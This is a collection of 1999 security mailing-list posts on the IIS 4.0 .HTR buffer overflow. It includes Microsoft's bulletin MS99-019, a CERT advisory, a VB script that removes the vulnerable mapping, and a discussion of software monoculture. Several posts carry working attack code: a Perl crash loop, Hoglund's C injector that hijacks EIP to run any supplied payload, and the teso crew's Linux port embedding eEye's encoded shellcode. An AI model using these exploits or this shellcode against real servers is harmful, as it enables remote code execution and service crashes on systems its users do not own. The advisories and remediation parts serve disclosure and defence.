print "$cmd\n";$obj->print("$cmd");
$obj->close;
}
--
----------------------------------------------------------------
Ryan R Permeh E-MAIL: rrpermeh@rconnect.com
IS Engineer WEB : http://www.rconnect.com
Rural Connections HELP : help@rconnect.com
FAQ : http://www.rconnect.com/help
SALES : sales@rconnect.com
----------------------------------------------------------------
120 First Street NE PHONE : (507) 281-5005
Rochester, MN 55906 FAX : (507) 281-9272
--------------------------------------------------------------------------------
Re: Retina vs. IIS4, Round 2, KO
Randal L. Schwartz (merlyn@STONEHENGE.COM)
Tue, 15 Jun 1999 16:59:08 -0700
>>>>> "Ryan" == Ryan R Permeh writes:
Ryan> #!/usr/bin/perl
Ryan> #props to the absu crew
Ryan> use Net::Telnet;
Ryan> for ($i=2500;$i<3500;$i++)
Ryan> {
Ryan> $obj=Net::Telnet->new( Host => "$ARGV[0]",Port => 80);
Ryan> my $cmd = "GET /". 'A' x $i . ".htr HTTP/1.0\n";
Ryan> print "$cmd\n";$obj->print("$cmd");
Ryan> $obj->close;
Ryan> }
It's silly to use Net::Telnet for HTTP:
use LWP::Simple;
for ($i = 2500; $i <= 3500; $i++) {
warn "$i\n";
get "http://$ARGV[0]/".('a' x $i).".htr";
}
--
Name: Randal L. Schwartz / Stonehenge Consulting Services (503)777-0095
Keywords: Perl training, UNIX[tm] consulting, video production, skiing, flying
Email: Snail: (Call) PGP-Key: (finger merlyn@teleport.com)
Web: My Home Page!
Quote: "I'm telling you, if I could have five lines in my .sig, I would!" -- me
--------------------------------------------------------------------------------
http://www.microsoft.com/security/bulletins/ms99-019.asp
Microsoft Security Bulletin (MS99-019)
Patch Available for Malformed HTR Request Vulnerability
Originally Posted: May 27, 1999
Summary
=======
Microsoft has released a patch that eliminates a vulnerability in Microsoft
(r) Internet Information Server 4.0. The vulnerability could allow denial
of service attacks against an IIS server or, under certain conditions,
could allow arbitrary code to be run on the server.
Microsoft has issued this bulletin to advise customers of steps they can
take to protect themselves against this vulnerability. A patch to eliminate
this vulnerability is being developed, and an update to this bulletin will
be released to advise customers when it is available.
Issue
=====
IIS supports several file types that require server-side processing. When a
web site visitor requests a file of one of these types, an appropriate
filter DLL processes it. A vulnerability exists in ISM.DLL, the filter DLL
that processes .HTR files. HTR files enable remote administration of user
passwords.
The vulnerability involves an unchecked buffer in ISM.DLL. This poses two
threats to safe operation. The first is a denial of service threat. A
malformed request for an .HTR file could overflow the buffer, causing IIS
to crash. The server would not need to be rebooted, but IIS would need to
be restarted. The second threat would be more difficult to exploit. A
carefully-constructed file request could cause arbitrary code to execute on
the server via a classic buffer overrun technique. Neither scenario could
occur accidentally. This vulnerability does not involve the functionality
of the password administration features of .HTR files.
While there are no reports of customers being adversely affected by this
vulnerability, Microsoft is proactively releasing this bulletin to allow
customers to take appropriate action to protect themselves against it.
Affected Software Versions
==========================
- Microsoft Internet Information Server 4.0
What Microsoft is Doing
=======================
Microsoft has provided a workaround that fixes the problem identified.
The workaround is discussed below in What Customers Should Do.
Microsoft also has sent this security bulletin to customers
subscribing to the Microsoft Product Security Notification Service.
See http://www.microsoft.com/security/services/bulletin.asp for more
information about this free customer service.
What Customers Should Do
========================
Microsoft highly recommends that customers disable the script mapping
for .HTR files as follows:
- From the desktop, start the Internet Service Manager
by clicking Start | Programs | Windows NT 4.0 Option
Pack | Microsoft Internet Information Server | Internet
Service Manager
- Double-click "Internet Information Server"
- Right-click on the computer name and select Properties
- In the Master Properties drop-down box, select "WWW Service",
then click the "Edit" button .
- Click the "Home Directory" tab, then click the "Configuration"
button.
- Highlight the line in the extension mappings that contains ".HTR",
then click the "Remove" button.
- Respond "yes" to "Remove selected script mapping?" say yes,
click OK 3 times, close ISM
A patch will be available shortly to eliminate the vulnerability
altogether.
Customers should monitor http://www.microsoft.com/security for an
announcement when the patches are available.
Microsoft recommends that customers review the IIS Security Checklist
at http://www.microsoft.com/security/products/iis/CheckList.asp
More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-019,
Workaround Available for "Malformed HTR Request" Vulnerability
(The Web-posted version of this bulletin),
http://www.microsoft.com/security/bulletins/ms99-019.asp.
- IIS Security Checklist,
http://www.microsoft.com/security/products/iis/CheckList.asp
Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please contact
Microsoft Technical Support. For information on contacting Microsoft
Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.
Revisions
=========
- June 15, 1999: Bulletin Created.
For additional security-related information about Microsoft products,
please visit http://www.microsoft.com/security
-------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.
(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 12:12:33 -0400
From: Russ
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Update to IIS Remote Hole.
Nelson Bunker has provided us with an VB app
which automates the process of updating your IIS 4.0 Metabase to remove
the ISM.DLL mappings which permit the eEye IISHack to work. Its a
temporary workaround while Microsoft continue to work on a proper fix
(which is expected today or tomorrow btw). For those of you with large
IIS installation, you might find this extremely useful.
If you use it, make sure you drop Nelson a line and thank him for it!
Check the NTBugtraq Home Page, http://ntbugtraq.ntadvice.com, in the
"What's New" section for links.
Cheers,
Russ - NTBugtraq Editor
For those of you that have too many IIS machines to yank this off by hand here is some vb code to set your IIS metabase remotely... VB 5.0 sp3 IIS Resource kit installed --
Metabase editor utility from resource kit needs to be installed.
Have fun! You can set all of you metabase up with the tools mentioned above. :-)
Nelson Bunker
'The subs I put in Modules handles the App Mappings tab of the
'application configuration screen
Sub AppMappings(ByRef IIS)
'delete all existing script paths
Call DeleteAllLowerProperties(IIS, "ScriptMaps")
'the only thing changed on scripts maps is htm & html mapped to
'asp.dll and removed the ism.dll mapping
newscriptmaps =
Array(".asa,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;",
".html,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;",
".asp,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;",
".cdx,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;",
".cer,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;",
".htm,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;",
".htw,C:\WINNT\System32\webhits.dll,3;",
".ida,C:\WINNT\System32\idq.dll,3;",
".idc,C:\WINNT\System32\inetsrv\httpodbc.dll,1;",
".idq,C:\WINNT\System32\idq.dll,3;",
".shtm,C:\WINNT\System32\inetsrv\ssinc.dll,1;",
".shtml,C:\WINNT\System32\inetsrv\ssinc.dll,1;",
".stm,C:\WINNT\System32\inetsrv\ssinc.dll,1")
IIS.PutEx 2, "ScriptMaps", newscriptmaps
IIS.SetInfo
End Sub
Sub DeleteAllLowerProperties(ByRef IIS, ByVal PropertyName)
'delete all existing script paths
PathList = IIS.GetDataPaths(PropertyName, 1)
If Err.Number <> 0 Then
For Each Path In PathList
Set objScriptPath = GetObject(Path)
objScriptPath.PutEx 1, PropertyName, True
Next
End If
End Sub
' Start form1 here
Function GetServerArray()
GetServerArray = Array("Websvr1", ...., "WebsvrX")
End Function
Private Sub Form_Load()
ServerArray = GetServerArray()
For Each Server In ServerArray
Set globalW3svc = GetObject("IIS://" & Server & "/W3SVC")
Call AppMappings(globalW3svc)
Next
End Sub
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 08:58:05 -0700
From: Greg Hoglund
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: IIS Remote Exploit (injection code)
I read yesturday on eEye.com that they had discovered a buffer overflow in
IIS. I could not resist writing an exploit. I did not have time to design
a really cool payload for this exploit, so I simply wrote the injection
code. However, this is meaningful for several reasons. Attached is the
injection code. The exploit will deliver any payload of your choosing.
Your payload will be executed. This empowers you to create a "collection"
of payloads that are not dependant upon the injection vector in any way.
This decoupling is important for military needs, where a single injection
vector needs to work, but the "warhead" may be different depending on the
targets characterization.
The exploit was fairly simple to build. In short, I read on eEye.com that
they had overflowed IIS with something like a ~3000 character URL. Within
minutes I had caused IIS to crash with EIP under my control. I used a
special pattern in the buffer (see code) to make it easy for me to identify
where EIP was being popped from. The pattern also made it easy to
determine where I was jumping around. Use the tekneek Danielson. ;-)
So, I controlled EIP, but I needed to get back to my stack segment, of
course. This is old school, and I really lucked out. Pushed down two
levels on the stack was an address for my buffer. I couldn't have asked
for more. So, I found a location in NTDLL.DLL (0x77F88CF0) that I could
return to. It had two pop's followed by a return. This made my injection
vector return to the value that was stored two layers down on the stack.
Bam, I was in my buffer. So, I landed in a weird place, had to add a near
jump to get to somewhere more useful.. nothing special, and here we are
with about 2K of payload space. If you don't supply any mobile code to be
run, the injection vector will supply some for you. The default payload in
simply a couple of no-ops followed by a debug breakpoint (interrupt 3)...
It's easy to play with if you want to build your own payloads.. just keep a
debugger attached to inetinfo.exe on the target machine.
Lastly, I would simply like to point out that monoculture installations are
very dangerous. It's a concept from agribusiness.. if you have all one
crop, and a virus comes along that can kill that crop, your out of
business. With almost ALL of the IIS servers on the net being vulnerable
to this exploit, we also have a monoculture. And, it's not just IIS. The
backbone of the Internet is built on common router technology (such as
cisco IOS). If a serious exploit comes along for the IOS kernel, can you
imagine the darkness that will fall?
<--- snip
// IIS Injector for NT
// written by Greg Hoglund
// http://www.rootkit.com
//
// If you would like to deliver a payload, it must be stored in a binary file.
// This injector decouples the payload from the injection code allowing you to
// create a numnber of different attack payloads. This code could be used, for
// example, by a military that needs to attack IIS servers, and has characterized
// the eligible hosts. The proper attack can be chosen depending on needs. Since
// the payload is so large with this injection vector, many options are available.
// First and foremost, virii can delivered with ease. The payload is also plenty
// large enough to remotely download and install a back door program.
// Considering the monoculture of NT IIS servers out on the 'Net, this represents a
// very serious security problem.
#include
#include
#include
void main(int argc, char **argv)
{
SOCKET s = 0;
WSADATA wsaData;
if(argc < 2)
{
fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " \
"http://www.rootkit.com\nUsage: %s \n", argv[0]);
exit(0);
}
WSAStartup(MAKEWORD(2,0), &wsaData);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(INVALID_SOCKET != s)
{
SOCKADDR_IN anAddr;
anAddr.sin_family = AF_INET;
anAddr.sin_port = htons(80);
anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
{
static char theSploit[4096];
// fill pattern
char kick = 'z'; //0x7a
char place = 'A';
// my uber sweet pattern gener@t0r
for(int i=0;i<4096;i+=4)
{
theSploit[i] = kick;
theSploit[i+1] = place;
theSploit[i+2] = place + 1;
theSploit[i+3] = place + 2;
if(++place == 'Y') // beyond 'XYZ'
{
place = 'A';
if(--kick < 'a') kick = 'a';
}
}
_snprintf(theSploit, 5, "get /");
_snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0");
// after crash, looks like inetinfo.exe is jumping to the address
// stored @ location 'GHtG' (0x47744847)
// cross reference back to the buffer pattern, looks like we need
// to store our EIP into theSploit[598]
// magic eip into NTDLL.DLL
theSploit[598] = (char)0xF0;
theSploit[599] = (char)0x8C;
theSploit[600] = (char)0xF8;
theSploit[601] = (char)0x77;
// code I want to execute
// will jump foward over the
// embedded eip, taking us
// directly to the payload
theSploit[594] = (char)0x90; //nop
theSploit[595] = (char)0xEB; //jmp
theSploit[596] = (char)0x35; //
theSploit[597] = (char)0x90; //nop
// the payload. This code is executed remotely.
// if no payload is supplied on stdin, then this default
// payload is used. int 3 is the debug interrupt and
// will cause your debugger to "breakpoint" gracefully.
// upon examiniation you will find that you are sitting
// directly in this code-payload.
if(argc < 3)
{
theSploit[650] = (char) 0x90; //nop
theSploit[651] = (char) 0x90; //nop
theSploit[652] = (char) 0x90; //nop
theSploit[653] = (char) 0x90; //nop
theSploit[654] = (char) 0xCC; //int 3
theSploit[655] = (char) 0xCC; //int 3
theSploit[656] = (char) 0xCC; //int 3
theSploit[657] = (char) 0xCC; //int 3
theSploit[658] = (char) 0x90; //nop
theSploit[659] = (char) 0x90; //nop
theSploit[660] = (char) 0x90; //nop
theSploit[661] = (char) 0x90; //nop
}
else
{
// send the user-supplied payload from
// a file. Yes, that's a 2K buffer for
// mobile code. Yes, that's big.
FILE *in_file;
in_file = fopen(argv[2], "rb");
if(in_file)
{
int offset = 650;
while( (!feof(in_file)) && (offset < 3000))
{
theSploit[offset++] = fgetc(in_file);
}
fclose(in_file);
}
}
send(s, theSploit, strlen(theSploit), 0);
}
closesocket(s);
}
}
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 10:59:38 -0000
From: Marc
To: BUGTRAQ@netspace.org
Subject: Update to IIS hole.
Hi,
We have been receiving some eMails from people saying that the iishack.exe
on our website is not working for them and is just crashing the remote
server. Here is what we know and do not know etc..
We have tested it on the English version of NT4.0, with IIS4.0, Service Pack
4 and 5.
We have had some people eMail us that they have this configuration and it is
not working... This very well could be possible that the offset we are using
is not working for some dll's and such... people might have a different
version and what not. For this case we *might* release a second exploit that
uses a better offset that should work on all nt4.0 iis4.0 sp4 and sp5
machines but honestly it is not that big of a deal to us. The hole is there,
and is exploitable and other people have been writing exploits for it also.
We do know that our exploit probably does not work on sp3 because off the
offset we use... we have gotten a few eMails about this and we never did
test nor claim it worked on sp3 but we *might* in our second version of the
exploit find a offset that works for sp3 also.
I honestly think this post is in some ways pointless but maybe it will help
to cut back some of the eMails we are getting about the above information.
Thank you to everyone who has been helping out.
Signed,
Marc
eEye Digital Security Team
http://www.eEye.com
P.S.
Jump on over to technotronic.com for some good information and other
exploits and such.
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 19:04:20 +0200 (CEST)
From: typo
To: bugtraq@netspace.org
Cc: packetstorm@genocide2600.com
Subject: iis4 remote exploit ported
the teso crew has ported the iis exploit to linux...
basically this program does the same as the windows version (written in
asm) of this exploit. Produced shellcode is identical.. everything should
work.. we haven't tested. Everyone except rootshell.com is allowed to put
a copy of this on his/her/their webpage.
visit #austria on ircnet for newest elite 0day exploits.
scut & typo
/* iis 4.0 exploit
* by eeye security
*
* ported to unix/C by the teso crew.
*
* shoutouts to #hax and everyone else knowing us...
* you know who you are.
*
* gcc -o tesoiis tesoiis.c -Wall
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec);
void net_write (int fd, const char *str, ...);
unsigned long int net_resolve (char *host);
char stuff[] = "\x42\x68\x66\x75\x41\x50"; /* "!GET /" */
#define URL_OFFSET 1055
char front[] = "GET /AAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"\x41\x41\x41\x41\x41\x41\xb0\x87\x67\x68\xb0\x87"
"\x67\x68\x90\x90\x90\x90\x58\x58\x90\x33\xc0\x50"
"\x5b\x53\x59\x8b\xde\x66\xb8\x21\x02\x03\xd8\x32"
"\xc0\xd7\x2c\x21\x88\x03\x4b\x3c\xde\x75\xf4\x43"
"\x43\xba\xd0\x10\x67\x68\x52\x51\x53\xff\x12\x8b"
"\xf0\x8b\xf9\xfc\x59\xb1\x06\x90\x5a\x43\x32\xc0"
"\xd7\x50\x58\x84\xc0\x50\x58\x75\xf4\x43\x52\x51"
"\x53\x56\xb2\x54\xff\x12\xab\x59\x5a\xe2\xe6\x43"
"\x32\xc0\xd7\x50\x58\x84\xc0\x50\x58\x75\xf4\x43"
"\x52\x53\xff\x12\x8b\xf0\x5a\x33\xc9\x50\x58\xb1"
"\x05\x43\x32\xc0\xd7\x50\x58\x84\xc0\x50\x58\x75"
"\xf4\x43\x52\x51\x53\x56\xb2\x54\xff\x12\xab\x59"
"\x5a\xe2\xe6\x33\xc0\x50\x40\x50\x40\x50\xff\x57"
"\xf4\x89\x47\xcc\x33\xc0\x50\x50\xb0\x02\x66\xab"
"\x58\xb4\x50\x66\xab\x58\xab\xab\xab\xb1\x21\x90"
"\x66\x83\xc3\x16\x8b\xf3\x43\x32\xc0\xd7\x3a\xc8"
"\x75\xf8\x32\xc0\x88\x03\x56\xff\x57\xec\x90\x66"
"\x83\xef\x10\x92\x8b\x52\x0c\x8b\x12\x8b\x12\x92"
"\x8b\xd7\x89\x42\x04\x52\x6a\x10\x52\xff\x77\xcc"
"\xff\x57\xf8\x5a\x66\x83\xee\x08\x56\x43\x8b\xf3"
"\xfc\xac\x84\xc0\x75\xfb\x41\x4e\xc7\x06\x8d\x8a"
"\x8d\x8a\x81\x36\x80\x80\x80\x80\x33\xc0\x50\x50"
"\x6a\x48\x53\xff\x77\xcc\xff\x57\xf0\x58\x5b\x8b"
"\xd0\x66\xb8\xff\x0f\x50\x52\x50\x52\xff\x57\xe8"
"\x8b\xf0\x58\x90\x90\x90\x90\x50\x53\xff\x57\xd4"
"\x8b\xe8\x33\xc0\x5a\x52\x50\x52\x56\xff\x77\xcc"
"\xff\x57\xec\x80\xfc\xff\x74\x0f\x50\x56\x55\xff"
"\x57\xd8\x80\xfc\xff\x74\x04\x85\xc0\x75\xdf\x55"
"\xff\x57\xdc\x33\xc0\x40\x50\x53\xff\x57\xe4\x90"
"\x90\x90\x90\xff\x6c\x66\x73\x6f\x66\x6d\x54\x53"
"\x21\x80\x8d\x84\x93\x86\x82\x95\x21\x80\x8d\x98"
"\x93\x8a\x95\x86\x21\x80\x8d\x84\x8d\x90\x94\x86"
"\x21\x80\x8d\x90\x91\x86\x8f\x21\x78\x8a\x8f\x66"
"\x99\x86\x84\x21\x68\x8d\x90\x83\x82\x8d\x62\x8d"
"\x8d\x90\x84\x21\x78\x74\x70\x64\x6c\x54\x53\x21"
"\x93\x86\x84\x97\x21\x94\x86\x8f\x85\x21\x94\x90"
"\x84\x8c\x86\x95\x21\x84\x90\x8f\x8f\x86\x84\x95"
"\x21\x88\x86\x95\x89\x90\x94\x95\x83\x9a\x8f\x82"
"\x8e\x86\x21\x90\x98\x8f\x4f\x86\x99\x86\x21"
/* stick it in here */
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21"
".htr HTTP/1.0";
void
usage (void)
{
printf ("usage: ./tesoiis host port url\n");
exit (EXIT_FAILURE);
}
int
main (int argc, char *argv[])
{
/* yadda,yadda.. you can try exploiting our exploit!!
* update: hmm.. is this exploitable? gets EIP touched by exit()?
* gotta check this later...
*/
char host[256], url[256];
int port,sd,t = 0;
int m = 0;
char *cc, *pfft;
struct sockaddr_in cs;
printf ("teso crew IIS exploit.. shellcode by eEye.\n");
printf ("------------------------------------------\n");
if (argc < 4)
usage();
strcpy (host, argv[1]);
strcpy (url, argv[3]);
port = atoi (argv[2]);
if ((port < 1) || (port > 65535))
usage();
cc = url;
pfft = front + URL_OFFSET;
while (*cc) {
if (*cc == '/' && 0 == t) {
memcpy (pfft, stuff, 6);
pfft += 6;
t = 1;
} else {
*pfft = *cc + 0x21;
pfft++;
}
cc++;
m += 1;
}
printf ("Host: %s Port: %d Url: %s\n", host, port, url);
printf ("Connecting... ");
fflush (stdout);
sd = net_connect (&cs, host, port, NULL, 0, 30);
if (sd < 1) {
printf ("failed!\n");
exit (EXIT_FAILURE);
}
printf ("done.. sending shellcode..");
fflush (stdout);
net_write (sd, "%s\n\n", front);
printf ("done.. closing fd!\n");
close (sd);
printf ("%s\n", front);
exit (EXIT_SUCCESS);
}
int
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
if (!(cs->sin_addr.s_addr = net_resolve (server))) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i == -1) {
he = gethostbyname(host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
void
net_write (int fd, const char *str, ...)
{
char tmp[8192];
va_list vl;
int i;
va_start(vl, str);
memset(tmp, 0, sizeof(tmp));
i = vsnprintf(tmp, sizeof(tmp), str, vl);
va_end(vl);
send(fd, tmp, i, 0);
return;
}
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 19:09:42 GMT
From: Ethan Benatan
To: BUGTRAQ@netspace.org
Subject: Re: IIS Remote Exploit (injection code)
>>> "Greg" == Greg Hoglund writes:
Greg> I read yesturday on eEye.com that they had discovered a buffer
Greg> overflow in IIS.....
Greg> Lastly, I would simply like to point out that monoculture
Greg> installations are very dangerous. It's a concept from
Greg> agribusiness.. if you have all one crop, and a virus comes
Greg> along that can kill that crop, your out of business.
Very true, and this is a terrifically important message to get out.
Not to be pedantic but actually it is a concept from ecology: the
"business", as Greg puts it, can be any system. Diversity makes for
resilience, and vice versa. Okay aleph, it's not a bug but it is a
way we should be thinking.
Greg> With
Greg> almost ALL of the IIS servers on the net being vulnerable to
Greg> this exploit, we also have a monoculture. And, it's not just
Greg> IIS. The backbone of the Internet is built on common router
Greg> technology (such as cisco IOS). If a serious exploit comes
Greg> along for the IOS kernel, can you imagine the darkness that
Greg> will fall?
Ethan
ethan+@pitt.edu
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 16:40:25 -0400
From: Dug Song
To: BUGTRAQ@netspace.org
Subject: Re: IIS Remote Exploit (injection code)
On Wed, 16 Jun 1999, Ethan Benatan wrote:
> Very true, and this is a terrifically important message to get out...
> Diversity makes for resilience, and vice versa.
see stephanie forrest's work on computer immunology:
http://www.cs.unm.edu/~immsec/
and to a lesser extent, random "canary" values in StackGuard:
http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/
and the introduction of randomness to defeat race attacks, predictable
sequence number attacks, etc. in OpenBSD:
http://www.openbsd.org/crypto.html
-d.
---
http://www.monkey.org/~dugsong/
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 15:03:52 -0700
From: Crispin Cowan
To: BUGTRAQ@netspace.org
Subject: Diversity (was: IIS Remote Exploit (injection code))
Dug Song wrote:
> On Wed, 16 Jun 1999, Ethan Benatan wrote:
>
> > Very true, and this is a terrifically important message to get out...
> > Diversity makes for resilience, and vice versa.
>
> see stephanie forrest's work on computer immunology:
>
> http://www.cs.unm.edu/~immsec/
>
> and to a lesser extent, random "canary" values in StackGuard:
>
> http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/
StackGuard came about because we investigated the approach of using
diversity to resist attack, and found it to be VERY limited in
effectiveness. The core problem is that when you change things, you
create incompatabilities for friend and foe alike, i.e. a diversity hack
strong enough to defeat an attacker is also likely to break a lot of
YOUR applications. This occurs because:
* The diversity hack must preserve many invariants that are necessary
to keep legitimate applications running, and these invariants are
often subtle and unknown, e.g. Linux applications that only work on
Red Hat systems.
* Simultaneously, the diversity hack must BREAK the invariants that the
attacker depends on, and these invariants are mostly unknown. If you
knew what they were, you would have fixed the bug :-)
Having discovered that diversity is hard to make both effective and
practical, we moved on to study what we call "restrictions." A
restriction prohibits certain classes of behavior that are always known to
be bad, e.g. changing the return address of an active function, which is
what stack smashes try to do, and what StackGuard prevents.
It is our conjecture that for every diversity hack that one can propose,
there is a restriction hack that is easier to deploy and more effective.
This has been true in practice as we try to construct security-enhancing
tools.
Full papers on these ideas can be found here:
http://www.cse.ogi.edu/DISC/projects/immunix/survivability.html
Crispin
-----
Crispin Cowan, Research Assistant Professor of Computer Science, OGI
NEW: Protect Your Linux Host with StackGuard'd Programs :FREE
http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/
Microsoft: Putting the "lame" in "layman"
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 16:30:12 -0400
From: CERT Advisory
Reply-To: cert-advisory-request@cert.org
To: cert-advisory@coal.cert.org
Subject: CERT Advisory CA-99.07 - IIS Buffer Overflow
-----BEGIN PGP SIGNED MESSAGE-----
CERT Advisory CA-99-07 IIS Buffer Overflow
Originally released: June 16, 1999
Source: CERT/CC
Systems Affected
* Machines running Microsoft Internet Information Server 4.0.
I. Description
A buffer overflow vulnerability affecting Microsoft Internet
Information Server 4.0 has been discovered in the ISM.DLL library.
According to Microsoft, ISM.DLL is the "filter DLL that processes .HTR
files. HTR files enable remote administration of user passwords."
A tool to exploit this vulnerability has been publicly released.
II. Impact
This vulnerability allows remote intruders to execute arbitrary code
with the privileges of the IIS server. Additionally, intruders can use
this vulnerability to crash vulnerable IIS processes.
III. Solution
Microsoft has released Microsoft Security Bulletin MS99-019 describing
a workaround to this problem. Additionally, Microsoft is working on a
patch to fix this problem; information regarding this patch will be
available in the Microsoft Security Bulletin. We encourage you to read
this bulletin, available from
http://www.microsoft.com/security/bulletins/ms99-019.asp
We will update this advisory as more information becomes available.
Please check the CERT/CC web site for the most current revision.
______________________________________________________________________
This document is available from:
http://www.cert.org/advisories/CA-99-07-IIS-Buffer-Overflow.html.
______________________________________________________________________
CERT/CC Contact Information
Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.
CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
Monday through Friday; they are on call for emergencies during other
hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email.
Our public PGP key is available from http://www.cert.org/CERT_PGP.key.
If you prefer to use DES, please call the CERT hotline for more
information.
Getting security information
CERT publications and other security information are available from
our web site http://www.cert.org/.
To be added to our mailing list for advisories and bulletins, send
email to cert-advisory-request@cert.org and include SUBSCRIBE
your-email-address in the subject of your message.
Copyright 1999 Carnegie Mellon University.
Conditions for use, disclaimers, and sponsorship information can be
found in http://www.cert.org/legal_stuff.html.
* "CERT" and "CERT Coordination Center" are registered in the U.S.
Patent and Trademark Office
